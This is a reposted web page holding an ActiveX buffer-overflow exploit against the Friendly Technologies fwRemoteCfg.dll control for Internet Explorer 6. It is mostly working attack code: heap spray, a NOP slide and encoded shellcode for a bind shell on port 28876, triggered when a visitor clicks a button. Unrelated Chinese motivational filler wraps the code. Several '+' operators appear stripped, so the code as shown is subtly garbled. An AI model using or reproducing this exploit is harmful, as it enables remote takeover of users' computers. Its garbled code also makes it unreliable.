Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

心情,是一种感情状态,拥有了好心情,也就拥有了自信,继而拥有了年轻和健康。就拥有了对未来生活的向往,充满期待,让我们拥有一份好心情吧,因为生活着就是幸运和快乐。
<!--
"Friendly Technologies" provide software like L2TP and PPPoE clients to ISPs,
who give the software to their customers on CD so they have less trouble setting up thire connections.
They also provide remote configuration solutions .. not the best idea if you ask me.

An overflow exists in fwRemoteCfg.dll provided with the dialer,
an example of the dialer can be found here:

==========================================================
|| Greetz to the binaryvision crew ||
|| Come visit @ http://www.binaryvision.org.il ||
|| or IRC at irc.nix.co.il / #binaryvision ||
==========================================================

* Tested on WinXP SP2 using IE6.
** For Education ONLY!
*** Written by spdr. (spdr01 [at] gmail.com)
-->

<html>
<title>Friendly Technologies - wayyy too friendly...</title>

<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id="sucker"></object>
<input type="button" value="Exploit!" onClick="exploit()">

<script>
function exploit() {
var Evil = ""; // Our Evil Buffer
var DamnIE = "\x0C\x0C\x0C\x0C"; // Damn IE changes address when not in the 0x00 - 0x7F range :(
// Need to use heap spray rather than overwrite EIP ...

// Skyland win32 bindshell (28876/tcp) shellcode
var ShellCode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");

var payLoadSize = ShellCode.length * 2; // Size of the shellcode
var SprayToAddress = 0x0C0C0C0C; // Spray up to there, could make it shorter.

var spraySlide = unescape("%u9090%u9090"); // Nop slide
var heapHdrSize = 0x38; // size of heap header blocks in MSIE, hopefully.
var BlockSize = 0x100000; // Size of each block
var SlideSize = BlockSize - (payLoadSize heapHdrSize); // Size of the Nop slide
var heapBlocks = (SprayToAddress - 0x100000) / BlockSize; // Number of blocks

spraySlide = MakeNopSlide(spraySlide, SlideSize); // Create our slide


// [heap header][nopslide][shellcode]
memory = new Array();
for (k = 0; k < heapBlocks; k )
memory[k] = spraySlide ShellCode;

// Create Evil Buffer
while(Evil.length < 800)
Evil = "A";
Evil = DamnIE;

// Pwn
sucker.CreateURLShortcut("con", "con", Evil, 1); // Using 'con' as filename, we dont really want to make a file.
}

function MakeNopSlide(spraySlide, SlideSize){
while(spraySlide.length * 2 < SlideSize)
spraySlide = spraySlide;
spraySlide = spraySlide.substring(0, SlideSize / 2);
return spraySlide;
}
</script>

</html>


以上就是Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit 。览前贤思己任铁杵磨针只求前程似锦,念亲情感师恩悬梁刺股但愿无愧我心。更多关于Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit 请关注haodaima.com其它相关文章!

标签: